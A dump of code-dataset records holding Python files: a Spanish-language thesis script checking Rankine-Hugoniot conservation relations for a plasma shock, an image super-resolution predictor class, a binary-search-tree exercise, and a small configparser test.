electrones', fontsize = font_label)\n# plt.xlabel('Energía [eV]', fontsize = font_label)\n# plt.ylim(ymin = ylim_min_u)\n# plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n# plt.grid(which = 'major', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n# \n# plt.subplot(122)\n# plt.title(r' Downstream - t = {} hora decimal'.format(round(t_swea[ind_td_Te],3)), fontsize = font_title)\n# plt.plot(nivelesenergia_swea, flujosenergia_swea[ind_td_Te,:], linewidth = lw, marker = 'o', markersize = msize, color = colors[0])\n# plt.yscale('log')\n# plt.xscale('log')\n# plt.xlabel('Energía [eV]', fontsize = font_label)\n# plt.ylim(ymin = ylim_min_d)\n# plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n# plt.grid(which = 'major', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n# \n# \n#\n#\n#Te_u, ind_aam_u, aam_u, f_gauss_u, params_u, ind_Emin_fit_u, ind_Emax_fit_u = Te(ind_tu_Te, 4, 43, 2e8, 10, 1, dist_e = flujosenergia_swea, energ = nivelesenergia_swea, t = t_swea) #* \n#Te_d, ind_aam_d, aam_d, f_gauss_d, params_d, ind_Emin_fit_d, ind_Emax_fit_d = Te(ind_td_Te, 16, 88, 6e8, 30, 1, dist_e = flujosenergia_swea, energ = nivelesenergia_swea, t = t_swea) #*\n#\n#if MODO_hipotesisMHD == 1:\n# \n# \n# plt.figure(12, figsize = figsize)\n# \n# plt.subplot(121)\n# plt.title(r' Upstream - t = {} hora decimal'.format(round(t_swea[ind_tu_Te],3)), fontsize = font_title)\n# plt.plot(nivelesenergia_swea, flujosenergia_swea[ind_tu_Te,:], linewidth = lw, marker = 'o', markersize = msize, color = colors[0])\n# plt.plot(nivelesenergia_swea, f_gauss_u, linewidth = lw, marker = 'o', markersize = msize, color = colors[1])\n# \n# plt.axvspan(xmin = 
nivelesenergia_swea[ind_Emin_fit_u], xmax = nivelesenergia_swea[ind_Emax_fit_u], facecolor = colors[2], alpha = 0.3)\n# plt.axhline(y = aam_u, linewidth = lw, color = colors[3], label = 'FWHM')\n# plt.axvline(x = Te_u, linewidth = lw, color = colors[4], label = r'$T_e$ = {} eV'.format(round(np.float64(Te_u),2)))\n# plt.axvline(x = params_u[1], linewidth = lw, color = colors[5], label = r'$\\mu$')\n# \n# plt.yscale('log')\n# plt.xscale('log')\n# plt.ylabel(r'Distribución de electrones', fontsize = font_label)\n# plt.xlabel('Energía [eV]', fontsize = font_label)\n# plt.ylim(ymin = ylim_min_u)\n# plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n# plt.legend(loc = 0, fontsize = font_leg)\n# plt.grid(which = 'major', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n# \n# \n# plt.subplot(122)\n# plt.title(r' Downstream - t = {} hora decimal'.format(round(t_swea[ind_td_Te],3)), fontsize = font_title)\n# plt.plot(nivelesenergia_swea, flujosenergia_swea[ind_td_Te,:], linewidth = lw, marker = 'o', markersize = msize, color = colors[0])\n# plt.plot(nivelesenergia_swea, f_gauss_d, linewidth = lw, marker = 'o', markersize = msize, color = colors[1])\n# \n# plt.axvspan(xmin = nivelesenergia_swea[ind_Emin_fit_d], xmax = nivelesenergia_swea[ind_Emax_fit_d], facecolor = colors[2], alpha = 0.3)\n# plt.axhline(y = aam_d, linewidth = lw, color = colors[3], label = 'FWHM')\n# plt.axvline(x = Te_d, linewidth = lw, color = colors[4], label = r'$T_e$ = {} eV'.format(round(np.float64(Te_d),2)))\n# plt.axvline(x = params_d[1], linewidth = lw, color = colors[5], label = r'$\\mu$')\n# \n# plt.yscale('log')\n# plt.xscale('log')\n# plt.xlabel('Energía [eV]', fontsize = font_label)\n# plt.ylim(ymin = ylim_min_d)\n# plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n# plt.legend(loc = 0, fontsize = font_leg)\n# plt.grid(which = 'major', axis = 'both', linewidth = lw, linestyle = '--', alpha = grid_alpha)\n# \n# plt.savefig(path_analisis+'Te{}'.format(shock_date))\n# plt.savefig(path_analisis+'Te{}.pdf'.format(shock_date)) \n# \n# \n# \n# \n#\n#%%\n#check the RH relations\n\n\n\n#choose the normal with respect to which the conservations are computed\nnorm = np.copy(N) #* now using the one from the fit\n\n\n#convert everything used in this section to SI\n\n\n# velocities in m/s (tangential and normal)\nU_u = Vu*(1e3)\nU_d = Vd*(1e3)\nU_un = np.dot(norm,U_u)\nU_dn = np.dot(norm,U_d)\nU_ut = (U_u - U_un*norm)\nU_dt = (U_d - U_dn*norm)\n\n#B in T (tangential and normal)\nB_u = Bu*(1e-9)\nB_d = Bd*(1e-9)\nB_un = np.dot(norm,B_u)\nB_dn = np.dot(norm,B_d)\nB_ut = (B_u - B_un*norm)\nB_dt = (B_d - B_dn*norm)\n\n#density in kg/m^3\nmp = 1.67e-27 #proton mass in kg\n#mp = 1.5e-10 #proton mass in joules/c^2\ndensnum_u = np.mean(densidad_swia[min(iu_v,fu_v):max(iu_v,fu_v)])*(1e6) #1/m^3\ndensnum_d = np.mean(densidad_swia[min(id_v,fd_v):max(id_v,fd_v)])*(1e6) #1/m^3\nrho_u = mp*densnum_u\nrho_d = mp*densnum_d\n\n#pressure assuming an ideal gas (in Pa=J/m^3)\nkB = 1.38e-23 #Boltzmann constant in J/K\n#for now assume T = 2*Ti; it should be T=Ti+Te\nTu = 2*np.mean(temperatura_swia_norm[min(iu_v,fu_v):max(iu_v,fu_v)])*(11604.5) #in K\nTd = 2*np.mean(temperatura_swia_norm[min(id_v,fd_v):max(id_v,fd_v)])*(11604.5) #in K\n##with Te estimated from the distributions\n#Tu = (np.mean(temperatura_swia_norm[min(iu_v,fu_v):max(iu_v,fu_v)])+Te_u)*(11604.5) #in K\n#Td = (np.mean(temperatura_swia_norm[min(id_v,fd_v):max(id_v,fd_v)])+Te_d)*(11604.5) #in K\nPu 
= densnum_u*kB*Tu\nPd = densnum_d*kB*Td\n\n\n\n#Mach numbers\n\nmu = (np.pi*4)*(1e-7) #magnetic permeability of vacuum in Wb/Am=mT/A\n\nv_alfv = (np.linalg.norm(B_u)/np.sqrt(mu*rho_u))*(1e-3) # km/s\nv_alfv_2 = (np.linalg.norm(B_u)/np.sqrt(mu*mp*(densnum_u + 0.05*densnum_u)))*(1e-3) # km/s taking n=n_p+n_He, with n_He = 5%n_p\n\nv_cs = (np.sqrt((Pu/(2*rho_u))*(5/3)))*(1e-3) # km/s\n#without the sqrt these give meaningless orders of magnitude:\n#v_cs_2 = ((5/3)*(kB*Tu)/mp)*(1e-3) #km/s\n#v_cs_3 = ((3*kB*Tu/2)/mp)*(1e-3) #km/s\n\nM_c = 2.7 #critical M_A for theta_Bun = 90; it decreases for smaller angles\nM_A = np.linalg.norm(Vu)/v_alfv_2\nM_cs = np.linalg.norm(Vu)/v_cs\nM_f = np.linalg.norm(Vu)/np.sqrt(v_alfv_2**2 + v_cs**2)\n\n#local Mach numbers\nM_A_loc = np.abs(np.dot(Vu,norm))/v_alfv_2\nM_cs_loc = np.abs(np.dot(Vu,norm))/v_cs\nM_f_loc = np.abs(np.dot(Vu,norm))/np.sqrt(v_alfv_2**2 + v_cs**2)\n\n\n#upstream plasma beta\nbeta = Pu/(np.linalg.norm(B_u)**2/(2*mu))\n\n\n#check whether the adiabatic-evolution hypothesis holds (gamma should give 5/3)\nG = Symbol('G')\neq_adiab = Pu*rho_u**G - (Pd*rho_d**G)\ngam = solve(eq_adiab, G)\n\n\n\n\n#RH relations as percentages (100 = satisfied perfectly)\n\n#mass conservation\ncons_masa_u = np.abs(rho_u*U_un)\ncons_masa_d = np.abs(rho_d*U_dn)\ncons_masa = np.min([cons_masa_u,cons_masa_d])/np.max([cons_masa_u,cons_masa_d])*100\n\n#conservation of momentum normal to the shock\ncons_impul_n_u = np.abs(rho_u*U_un**2 + Pu + np.dot(B_u,B_u)/(2*mu))\ncons_impul_n_d = np.abs(rho_d*U_dn**2 + Pd + np.dot(B_d,B_d)/(2*mu))\ncons_impul_n = np.min([cons_impul_n_d,cons_impul_n_u])/np.max([cons_impul_n_d,cons_impul_n_u])*100\n\n#conservation of momentum tangential to the shock\ncons_impul_t_u = np.abs(rho_u*U_un*U_ut - B_un/mu*B_ut)\ncons_impul_t_d = np.abs(rho_d*U_dn*U_dt - B_dn/mu*B_dt)\ncons_impul_t = np.empty_like(cons_impul_t_u)\nfor i in range(len(cons_impul_t_u)):\n cons_impul_t[i] = np.min([cons_impul_t_d[i],cons_impul_t_u[i]])/np.max([cons_impul_t_d[i],cons_impul_t_u[i]])*100\n\n#energy conservation\ngamma = 5/3\ncons_energ_u = np.abs(rho_u*U_un*(1/2*np.dot(U_u,U_u) + gamma/(gamma-1)*Pu/rho_u) + U_un*np.dot(B_u,B_u)/mu - np.dot(U_u,B_u)*B_un/mu)\ncons_energ_d = np.abs(rho_d*U_dn*(1/2*np.dot(U_d,U_d) + gamma/(gamma-1)*Pd/rho_d) + U_dn*np.dot(B_d,B_d)/mu - np.dot(U_d,B_d)*B_dn/mu)\ncons_energ = np.min([cons_energ_d,cons_energ_u])/np.max([cons_energ_d,cons_energ_u])*100\n\n#conservation of the normal component of B\ncons_Bn_u = np.abs(B_un)\ncons_Bn_d = np.abs(B_dn)\ncons_Bn = np.min([cons_Bn_d,cons_Bn_u])/np.max([cons_Bn_d,cons_Bn_u])*100\n\n#conservation of the tangential electric field\ncons_Et_u = np.abs(U_un*B_ut - B_un*U_ut)\ncons_Et_d = np.abs(U_dn*B_dt - B_dn*U_dt)\ncons_Et = np.empty_like(cons_Et_u)\nfor i in range(len(cons_Et)):\n cons_Et[i] = np.min([cons_Et_d[i],cons_Et_u[i]])/np.max([cons_Et_d[i],cons_Et_u[i]])*100\n\n#coplanarity hypothesis\nhipt_copl_B = np.dot(norm,np.cross(B_u,B_d))\n\n\n#%%------------------------------- SAVE RESULTS ------------------------------\n\nif MODO_hipotesisMHD == 1:\n \n datos6 = np.zeros([14,6])\n \n #reference normal\n datos6[0,0:3] = norm\n \n #Tu Td Pu Pd rho_u rho_d\n datos6[1,0] = Tu\n datos6[1,1] = Td\n datos6[1,2] = Pu\n datos6[1,3] = Pd\n datos6[1,4] = rho_u\n datos6[1,5] = rho_d\n \n #adiabatic-evolution gamma\n datos6[2,0] = gam\n \n #velocities\n datos6[3,0] = v_alfv\n datos6[3,1] = v_cs\n datos6[3,2] = v_cs_2\n datos6[3,3] = v_cs_3\n \n #Mach numbers\n datos6[4,0] = M_A\n datos6[4,1] = M_cs\n 
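# Aside: a rough sanity check of the Mach numbers above, with hypothetical round values\n # (|B_u| ~ 5e-9 T and n ~ 5e6 m^-3 are illustrative only, not this event's data):\n # v_A = |B_u|/np.sqrt(mu*mp*n) = 5e-9/np.sqrt(4*np.pi*1e-7*1.67e-27*5e6) ~ 4.9e4 m/s ~ 49 km/s,\n # so an upstream flow |Vu| ~ 350 km/s gives M_A ~ 7, super-Alfvenic as expected for a fast shock.\n 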
datos6[4,2] = M_f\n datos6[4,3] = M_c\n \n #upstream beta\n datos6[5,0] = beta\n \n #conservations\n datos6[6,0] = cons_masa\n datos6[7,0:3] = cons_impul_n\n datos6[8,0:3] = cons_impul_t\n datos6[9,0:3] = cons_energ\n datos6[10,0] = cons_Bn\n datos6[11,0:3] = cons_Et\n \n #coplanarity theorem hypothesis\n datos6[12,0] = hipt_copl_B\n \n #B jump, rho jump\n datos6[13,0] = saltoB\n datos6[13,1] = saltorho\n \n np.savetxt(path_analisis+'hipotesis_MHD_shock_{}'.format(shock_date), datos6, delimiter = '\t',\n header = '\n'.join(['{}'.format(shock_date),'normal de ref usada en calculos',\n 'Tu Td [K] Pu Pd [Pa], rho_u rho_d [kg/m^3]',\n 'gamma si el sist evolucionara adiabaticamente',\n 'v_alf v_cs v_cs_2 v_cs_3',\n 'M_Alfv M_sonico M_rapido M_critico', 'beta',\n 'conservacion masa',\n 'conservacion impulso norm',\n 'conservacion impulso tang',\n 'conservacion energia',\n 'conservacion Bn',\n 'conservacion campo electrico tang',\n 'hipotesis teo coplanaridad [nT]',\n 'salto B salto rho']))\n", "repo_name": "sofiaburne/Tesis", "sub_path": "conservaciones.py", "file_name": "conservaciones.py", "file_ext": "py", "file_size_in_byte": 17021, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "mag.shock_date", "line_number": 24, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "delimitacionshock.t_mag", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "delimitacionshock.t_swia_mom", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 93, "usage_type": "call"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 93, "usage_type": "name"}, {"api_name": "delimitacionshock.iu_v", "line_number": 93, "usage_type": "argument"}, {"api_name": "delimitacionshock.fu_v", "line_number": 93, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 94, "usage_type": "call"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 94, "usage_type": "name"}, {"api_name": "delimitacionshock.id_v", "line_number": 94, "usage_type": "argument"}, {"api_name": "delimitacionshock.fd_v", "line_number": 94, "usage_type": "argument"}, {"api_name": "delimitacionshock.norm_Bd", "line_number": 96, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bu", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "delimitacionshock.t_mag", "line_number": 102, "usage_type": "argument"}, {"api_name": "delimitacionshock.B", "line_number": 102, "usage_type": "argument"}, {"api_name": "delimitacionshock.norm_Bu", "line_number": 103, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bd", "line_number": 104, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bd", "line_number": 105, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bu", 
"line_number": 105, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bd", "line_number": 106, "usage_type": "name"}, {"api_name": "delimitacionshock.norm_Bu", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.twinx", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "delimitacionshock.t_swia_mom", "line_number": 116, "usage_type": "argument"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 116, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "mag.shock_date", "line_number": 128, "usage_type": "argument"}, {"api_name": "mag.shock_date", "line_number": 129, "usage_type": "argument"}, {"api_name": "numpy.copy", "line_number": 247, "usage_type": "call"}, {"api_name": "subestructuras_calculos_2.N", "line_number": 247, "usage_type": "argument"}, {"api_name": "delimitacionshock.Vu", "line_number": 254, "usage_type": "name"}, {"api_name": "delimitacionshock.Vd", "line_number": 255, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 257, "usage_type": "call"}, {"api_name": "delimitacionshock.Bu", "line_number": 262, "usage_type": "name"}, {"api_name": "delimitacionshock.Bd", "line_number": 263, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 272, "usage_type": "call"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 272, "usage_type": "name"}, {"api_name": "delimitacionshock.iu_v", "line_number": 272, "usage_type": "argument"}, {"api_name": "delimitacionshock.fu_v", "line_number": 272, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 273, "usage_type": "call"}, {"api_name": "delimitacionshock.densidad_swia", "line_number": 273, "usage_type": "name"}, {"api_name": "delimitacionshock.id_v", "line_number": 273, "usage_type": "argument"}, {"api_name": "delimitacionshock.fd_v", "line_number": 273, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 280, "usage_type": "call"}, {"api_name": "delimitacionshock.temperatura_swia_norm", "line_number": 280, "usage_type": "name"}, {"api_name": "delimitacionshock.iu_v", "line_number": 280, "usage_type": "argument"}, {"api_name": "delimitacionshock.fu_v", "line_number": 280, "usage_type": "argument"}, {"api_name": "numpy.mean", "line_number": 281, "usage_type": "call"}, {"api_name": 
"delimitacionshock.temperatura_swia_norm", "line_number": 281, "usage_type": "name"}, {"api_name": "delimitacionshock.id_v", "line_number": 281, "usage_type": "argument"}, {"api_name": "delimitacionshock.fd_v", "line_number": 281, "usage_type": "argument"}, {"api_name": "numpy.pi", "line_number": 292, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 294, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 295, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 303, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 303, "usage_type": "argument"}, {"api_name": "numpy.linalg", "line_number": 303, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 304, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 304, "usage_type": "argument"}, {"api_name": "numpy.linalg", "line_number": 304, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 305, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 305, "usage_type": "argument"}, {"api_name": "numpy.linalg", "line_number": 305, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 308, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 308, "usage_type": "argument"}, {"api_name": "numpy.abs", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 309, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 309, "usage_type": "argument"}, {"api_name": "numpy.abs", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 310, "usage_type": "call"}, {"api_name": "delimitacionshock.Vu", "line_number": 310, "usage_type": "argument"}, {"api_name": "numpy.sqrt", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 314, "usage_type": "attribute"}, {"api_name": "sympy.Symbol", "line_number": 318, "usage_type": "call"}, {"api_name": "sympy.solvers.solve", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 340, 
"usage_type": "call"}, {"api_name": "numpy.min", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 416, "usage_type": "call"}, {"api_name": "mag.shock_date", "line_number": 416, "usage_type": "argument"}, {"api_name": "mag.shock_date", "line_number": 417, "usage_type": "argument"}]} +{"seq_id": "23951806600", "text": "from time import time\n\nimport imageio\nimport yaml\nimport numpy as np\nfrom pathlib import Path\n\nfrom ISR.utils.logger import get_logger\nfrom ISR.utils.utils import get_timestamp\n\n\nclass Predictor:\n \"\"\"The predictor class handles prediction, given an input model.\n\n Loads the images in the input directory, executes prediction given a model\n and saves the results in the output directory.\n Can receive a path for the weights or can let the user browse through the\n weights directory for the desired weights.\n\n Args:\n input_dir: string, path to the input directory.\n output_dir: string, path to the output directory.\n verbose: bool.\n\n Attributes:\n extensions: list of accepted image extensions.\n img_ls: list of image files in input_dir.\n\n Methods:\n get_predictions: given a model and a string containing the weights' path,\n runs the predictions on the images contained in the input directory and\n stores the results in the output directory.\n \"\"\"\n\n def __init__(self, input_dir, output_dir='./data/output', verbose=True):\n\n self.input_dir = Path(input_dir)\n self.data_name = self.input_dir.name\n self.output_dir = Path(output_dir) / self.data_name\n self.logger = get_logger(__name__)\n if not verbose:\n self.logger.setLevel(40)\n self.extensions = ('.jpeg', '.jpg', '.png') # file extensions that are admitted\n self.img_ls = [f for f in self.input_dir.iterdir() if f.suffix in self.extensions]\n if len(self.img_ls) < 1:\n self.logger.error('No valid image files found (check config file).')\n raise ValueError('No valid image files found (check config file).')\n # Create results folder\n if not self.output_dir.exists():\n self.logger.info('Creating output directory:\\n{}'.format(self.output_dir))\n self.output_dir.mkdir(parents=True)\n\n def _load_weights(self):\n \"\"\" Invokes the model's load weights function if any 
weights are provided. \"\"\"\n if self.weights_path is not None:\n self.logger.info('Loaded weights from \\n > {}'.format(self.weights_path))\n # loading by name automatically excludes the vgg layers\n self.model.model.load_weights(str(self.weights_path))\n else:\n self.logger.error('Error: Weights path not specified (check config file).')\n raise ValueError('Weights path not specified (check config file).')\n\n session_config_path = self.weights_path.parent / 'session_config.yml'\n if session_config_path.exists():\n conf = yaml.load(session_config_path.read_text(), Loader=yaml.FullLoader)\n else:\n self.logger.warning('Could not find weights training configuration')\n conf = {}\n conf.update({'pre-trained-weights': self.weights_path.name})\n return conf\n\n def _make_basename(self):\n \"\"\" Combines the generator's name and its architecture's parameters. \"\"\"\n\n params = [self.model.name]\n for param in np.sort(list(self.model.params.keys())):\n params.append('{g}{p}'.format(g=param, p=self.model.params[param]))\n return '-'.join(params)\n\n def get_predictions(self, model, weights_path):\n \"\"\" Runs the prediction. \"\"\"\n\n self.model = model\n self.weights_path = Path(weights_path)\n weights_conf = self._load_weights()\n out_folder = self.output_dir / self._make_basename() / get_timestamp()\n self.logger.info('Results in:\\n > {}'.format(out_folder))\n if out_folder.exists():\n self.logger.warning('Directory exists, might overwrite files')\n else:\n out_folder.mkdir(parents=True)\n if weights_conf:\n yaml.dump(weights_conf, (out_folder / 'weights_config.yml').open('w'))\n # Predict and store\n for img_path in self.img_ls:\n output_path = out_folder / img_path.name\n self.logger.info('Processing file\\n > {}'.format(img_path))\n start = time()\n sr_img = self._forward_pass(img_path)\n end = time()\n self.logger.info('Elapsed time: {}s'.format(end - start))\n self.logger.info('Result in: {}'.format(output_path))\n imageio.imwrite(output_path, sr_img)\n\n def _forward_pass(self, file_path):\n lr_img = imageio.imread(file_path)\n if lr_img.shape[2] == 3:\n sr_img = self.model.predict(lr_img)\n return sr_img\n else:\n self.logger.error('{} is not an image with 3 channels.'.format(file_path))\n", "repo_name": "idealo/image-super-resolution", "sub_path": "ISR/predict/predictor.py", "file_name": "predictor.py", "file_ext": "py", "file_size_in_byte": 4631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4348, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 39, "usage_type": "call"}, {"api_name": "ISR.utils.logger.get_logger", "line_number": 40, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 65, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.sort", "line_number": 76, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 84, "usage_type": "call"}, {"api_name": "ISR.utils.utils.get_timestamp", "line_number": 86, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "imageio.imwrite", "line_number": 103, "usage_type": "call"}, {"api_name": "imageio.imread", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "31574268787", "text": "# Definition for a binary tree 
node.\r\nfrom typing import Optional\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\n\r\nclass Solution:\r\n def increasingBST(self, root: TreeNode) -> Optional[TreeNode]:\r\n \"\"\"\r\n Given the root of a binary search tree, rearrange the tree in in-order so that the leftmost node\r\n in the tree is now the root of the tree, and every node has no left child and only one right child.\r\n :param root: root of the tree \r\n :return: the root of the tree after rearranging\r\n \"\"\"\r\n # Idea: DFS on the tree and create a new tree\r\n # Time complexity: O(n)\r\n # Space complexity: O(n)\r\n if not root:\r\n return None\r\n self.res = []\r\n\r\n def dfs(node):\r\n if not node:\r\n return\r\n dfs(node.left)\r\n self.res.append(node.val)\r\n dfs(node.right)\r\n \r\n dfs(root)\r\n new_root = TreeNode(self.res[0])\r\n cur = new_root\r\n for i in range(1, len(self.res)):\r\n cur.right = TreeNode(self.res[i])\r\n cur = cur.right\r\n return new_root\r\n\r\n ", "repo_name": "datboi2001/DSA", "sub_path": "Graph/DFS_on_graph/increasing_order_tree.py", "file_name": "increasing_order_tree.py", "file_ext": "py", "file_size_in_byte": 1259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "5894178320", "text": "import configparser\nimport os\n\n\ndef test_get_config():\n config = configparser.ConfigParser()\n # os.environ['HOME']\n # xpath = os.path.join(os.environ['HOMEPATH'], 'host.ini')\n xpath = 'D:/拉钩/work/pythonProject/Ellie/lianxi/host.ini'\n config.read(xpath)\n r = config.options(\"mysql\")\n print(r)\n print(config.get('mysql','host'))\n print(config.items(\"mysql\"))\n return config\n\n # print('get all sections of the config file', sections)\n #\n # options = conf.options('mysql')\n # print('get all options under the given section', options)\n #\n # items = conf.items('mysql')\n # print('get all key-value pairs under the given section', items)\n #\n # value = conf.get('mysql', 'host')\n # print('get the option under the given section', type(value), value)\n", "repo_name": "Ellie2020-ellie/Hogwarts_works", "sub_path": "Ellie/lianxi/test_host_ini.py", "file_name": "test_host_ini.py", "file_ext": "py", "file_size_in_byte": 789, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "configparser.ConfigParser", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "25878616113", "text": "import pandas 